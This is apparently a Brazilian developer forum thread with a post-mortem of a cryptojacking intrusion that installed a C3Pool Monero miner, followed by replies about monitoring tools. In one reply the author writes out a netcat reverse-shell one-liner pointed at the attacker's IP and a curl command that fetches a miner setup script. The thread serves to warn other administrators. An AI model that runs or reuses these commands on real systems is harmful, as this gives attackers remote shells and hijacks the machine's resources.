Executando verificação de segurança...
12
verdedev11
1 min de leitura ·

🚨 99% de CPU: Como lidamos com um ataque de Cryptojacking no nosso servidor

Ninguém acha que vai acontecer até ver o monitor de recursos bater no teto. Ontem, notamos uma lentidão incomum em nossa aplicação. Ao investigar, o diagnóstico foi claro: estávamos sendo usados para minerar criptomoedas.

Identificamos um ataque sofisticado que explorou uma brecha para instalar um minerador (C3Pool) via Reverse Shell.

🔍 Anatomia do Ataque: O atacante injetou um script malicioso que consumiu 99% do nosso processamento.

O vetor: Um Reverse Shell clássico via Netcat tentando abrir uma backdoor.

O objetivo: Lucro rápido minerando Monero (XMR) para a carteira 49Cf4...Stbv. Identificamos também o IP do atacante (171.252.32.135) e bloqueamos no firewall.

🛡️ O que fizemos: Imediatamente isolamos a máquina. Devido à natureza do backdoor (e para garantir que nenhum outro bot estivesse escondido), optamos pela política de Terra Arrasada:

O servidor comprometido foi descartado.

Subimos uma nova infraestrutura do zero com hardening reforçado.

Implementamos novas regras de Firewall e atualizamos a aplicação com as correções de segurança o mais rápido possível.

Fica o alerta para a comunidade: Monitore seus processos e portas de saída!

👇 E vocês? Já tiveram que lidar com invasão de mineradores? Qual ferramenta de monitoramento salvou a pele de vocês?

#CyberSecurity #DevOps #PostMortem #Cibersegurança #Tech #Cryptojacking

Fonte: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

Carregando publicação patrocinada...
3
leodip

Interessante... você pode compartilhar mais sobre "ataque sofisticado que explorou uma brecha...". O que foi explorado, exatamente? Apenas curiosidade.

1
verdedev11
  • Autor
    Autor

Mano é tipo de hacker muito novo...ele assume recursos do seu servidor, brecha de segurança muito grande! dependendo da sua infra-estrutura ele pode acessar outras maquinas, comprometer banco de dados, e instalar recursos no seu servidor etc até mesmo pedir resgate sobre seus dados!

Forma de attack em 05 etapas!

1.Reverse Shell (Backdoor)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 171.252.32.135 7700 >/tmp/f
literalmente IP do atacante (171.252.32.135) no firewall..

2.instalação de malwares via scripts.sh

3.Instalação do Minerador de Criptomoeda (C3Pool)
curl https://gist.githubusercontent.com/demonic-agents/39e943f4de855e2aef12f34324cbf150/raw/.../setup_c3pool_miner.sh

4.Tentativa de Reinicialização e assumir maquina (Falhou por falta de privilégios (sorte!))
shutdown -r now
daqui pra frente ele livre acesso!

5.Depois tenta esconder seus rastros para que administrador não consiga perceber!

@ErickWendelAcademy
tmb foi atacado da msm forma! fez até video sobre se quiser saber mais ele explica direitinho!
https://www.youtube.com/watch?v=5ygcZt2Co7w&list=PLqFwRPueWb5dtayur87Zegfvi7QrwAQSM

1
leodip

Beleza, já entendi, foi um 0-day do React/Vercel.

É que "Reverse shell" é a consequência da exploração de uma falha. Eu tava curioso pra saber QUAL foi a falha. No caso do video, ao menos, foi o React.

2
verdedev11
  • Autor
    Autor

Bem observado. No caso do vídeo do Erick, o vetor foi realmente o RCE nos Server Components. O que destaquei aqui foi a kill chain (o comportamento pós-exploração), que costuma seguir esse padrão independentemente da porta de entrada.

Mas sim, a falha partiu do React! É tenso pensar que alguém de alto escalão liberou uma versão oficial com uma brecha dessas para a massa de usuários.

1
AlexHinckel

Aqui na Proactus Tecnologia, onde atuo, ainda não registramos nenhum caso de mineração de dados, mas já lidamos com outras tentativas de violação, como ataques DoS e Brute Force.

Para prevenção e monitoramento, utilizamos um ambiente o Zabbix integrado ao Grafana na maioria dos clientes, além de soluções especificas para proteção como o Fail2ban, que auxilia no bloqueio automático de acessos suspeitos.

1
lucaslamounier08

Muito bom ver um relato técnico detalhado assim, raros conseguem rastrear tudo direitinho. O alerta sobre monitoramento contínuo de CPU e portas abiertas é essencial, qual ferramenta vocês estão usando agora para alertas de anomalias em tempo real?

1
verdedev11
  • Autor
    Autor

Cara criamos sistema de logs em python que pega tmb informações da maquina! faz alerta. Não é nenhuma ferramenta instalada. simplesmente achamos logs estranhos conseguimos pegar suspeito!